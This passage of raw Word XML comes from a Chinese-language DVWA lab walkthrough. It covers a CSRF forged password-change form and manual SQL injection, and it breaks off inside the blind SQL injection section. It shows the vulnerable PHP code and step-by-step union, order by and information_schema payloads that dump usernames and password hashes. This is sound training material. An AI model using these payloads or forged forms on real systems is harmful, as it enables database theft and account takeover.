          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>="password"&gt;</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ab/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">&lt;input type="hidden" name="password_conf" </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">="password"&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r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">&lt;input type="hidden" name="step" </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">="2"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r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">&lt;input type="hidden" name="Change" </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">="Change"&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t xml:space="preserve">&lt;/form&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lt;/div&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body&gt;</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html&g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当受害者访问这个页面时，攻击脚本会伪造改密请求发送给服务器。</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8A55949" wp14:editId="5A5F1804">
            <wp:extent cx="5400136" cy="3087916"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="86" name="图片 86" descr="1.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p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292" cy="308800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美中不足的是，受害者会看到更改密码成功的界面（这是因为修改密码成功后，服务器会返回302，实现自动跳转），从而意识到自己遭到了攻击。</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D292AC5" wp14:editId="7F5A8ED2">
            <wp:extent cx="4287520" cy="1112520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85" name="图片 85" descr="1.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pn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7520" cy="1112520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="009655A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>SQL Injection</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SQL Injection，即SQL注入，是指攻击者通过注入恶意的SQL命令，破坏SQL查询语句的结构，从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的，常常会导致整个数据库被“脱裤”，尽管如此，SQL注入仍是现在最常</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>见的Web漏洞之一。近期很火的大使馆接连被黑事件，据说黑客依靠的就是常见的SQL注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>手工注入思路</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自动化的注入神器sqlmap固然好用，但还是要掌握一些手工注入的思路，下面简要介绍手工注入（非盲注）的步骤。</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判断是否存在注入，注入是字符型还是数字型</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2.猜解SQL查询语句中的字段数</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3.确定显示的字段顺序</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4.获取当前数据库</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5.获取数据库中的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6.获取表中的字段名</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7.下载数据</w:t>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REQUEST[ 'Submit' ] ) ) { </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Get input </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $id = $_REQUEST[ 'id' ]; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Check database </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $result = mysql_query( $query ) </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t> die( '&lt;pre&gt;' . mysql_error() . '&lt;/pre&gt;' ); </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Get results </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $num = mysql_numrows( $result ); </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $i   = 0; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>( $i &lt; $num ) { </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        // Get values </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $first = mysql_result( $result, $i, "first_name" ); </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $last  = mysql_result( $result, $i, "last_name"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w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t> user </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        echo "&lt;pre&gt;ID: {$id}&lt;br /&gt;First name: {$first}&lt;br /&gt;Surname: {$last}&lt;/pre&gt;";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kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>        // Increase loop count </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $i++;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Low级别的代码对来自客户端的参数id没有进行任何的检查与过滤，存在明显的SQL注入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞利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现实攻击场景下，攻击者是无法看到后端代码的，所以下面的手工注入步骤是建立在无法看到源码的基础上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.判断是否存在注入，注入是字符型还是数字型</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0260486" wp14:editId="5D887ACB">
            <wp:extent cx="3631565" cy="1716405"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="116" name="图片 116" descr="1.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1565" cy="171640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and ‘1’ =’2，查询失败，返回结果为空：</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7DBB016" wp14:editId="21FF1CE0">
            <wp:extent cx="4658360" cy="1259205"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="115" name="图片 115" descr="1.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8360" cy="125920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or ‘1234 ’=’1234，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530391E5" wp14:editId="4B00D3D6">
            <wp:extent cx="4701540" cy="3709670"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="114" name="图片 114" descr="1.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370967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返回了多个结果，说明存在字符型注入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.猜解SQL查询语句中的字段数</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order by 1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9CB83D1" wp14:editId="0F8CE948">
            <wp:extent cx="5218981" cy="3962353"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="113" name="图片 113" descr="1.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6570" cy="396811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order by 2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2BDE287A" wp14:editId="04C3A871">
            <wp:extent cx="4831080" cy="3907790"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="112" name="图片 112" descr="1.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1080" cy="390779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order by 3 #，查询失败：</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61219B8A" wp14:editId="6158E894">
            <wp:extent cx="3838575" cy="1483995"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1905"/>
            <wp:docPr id="111" name="图片 111" descr="1.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8575" cy="148399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执行的SQL查询语句中只有两个字段，即这里的First name、Surname。</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这里也可以通过输入union select 1,2,3…来猜解字段数）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.确定显示的字段顺序</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2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2ADF61BD" wp14:editId="56B55FAF">
            <wp:extent cx="4744720" cy="2303145"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="110" name="图片 110" descr="1.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4720" cy="230314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执行的SQL语句为select First name,Surname from 表 where ID=’id’…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.获取当前数据库</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database()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724961E" wp14:editId="219FB2B3">
            <wp:extent cx="4399280" cy="2303145"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1905"/>
            <wp:docPr id="109" name="图片 109" descr="1.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9280" cy="230314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当前的数据库为dvwa。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.获取数据库中的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group_concat(table_name) from information_schema.tables where table_schema=database()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697408B" wp14:editId="7393BADB">
            <wp:extent cx="5244861" cy="2096074"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="108" name="图片 108" descr="1.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5013" cy="209613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dvwa中一共有两个表，guestbook与users。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.获取表中的字段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group_concat(column_name) from information_schema.columns where table_name=’users’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57463C4" wp14:editId="5D240196">
            <wp:extent cx="5253487" cy="2113218"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1905"/>
            <wp:docPr id="107" name="图片 107" descr="1.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3640" cy="211328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中有8个字段，分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.下载数据</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union select group_concat(user_id,first_name,last_name),group_concat(password) from users #，查询成功：</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495DB7DA" wp14:editId="2B62F04D">
            <wp:extent cx="5287993" cy="2536116"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="106" name="图片 106" descr="1.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147" cy="253619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这样就得到了users表中所有用户的user_id,first_name,last_name,password的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="009655A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>SQL Injection(Blind)</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SQL Injection（Blind），即SQL盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>手工盲注思路</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手工盲注的过程，就像你与一个机器人聊天，这个机器人知道的很多，但只会回答“是”或者“不是”，因此你需要询问它这样的问题，例如“数据库名字的第一个字母是不是a啊？”，通过这种机械的询问，最终获得你想要的数据。</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盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注，这里由于实验环境的限制，只演示基于布尔的盲注与基于时间的盲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下面简要介绍手工盲注的步骤（可与之前的</w:t>
      </w:r>
      <w:hyperlink r:id="rId86" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>手工注入</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>作比较）：</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判断是否存在注入，注入是字符型还是数字型</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2.猜解当前数据库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3.猜解数据库中的表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4.猜解表中的字段名</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5.猜解数据</w:t>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GET[ 'Submit' ] ) ) { </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Get input </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $id = $_GET[ 'id' ]; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Check database </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Get results </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $num = @mysql_numrows( $result ); // The '@' character suppresses errors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num &gt; 0 ) { </w:t>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end user </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        echo '&lt;pre&gt;User ID exists in the database.&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User wasn't found, so the page wasn't! </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found'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end user </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>        echo '&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;';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Low级别的代码对参数id没有做任何检查、过滤，存在明显的SQL注入漏洞，同时SQL语句查询返回的结果只有两种，‘</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User ID exists </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> the database.</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与‘</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User ID </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> MISSING </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
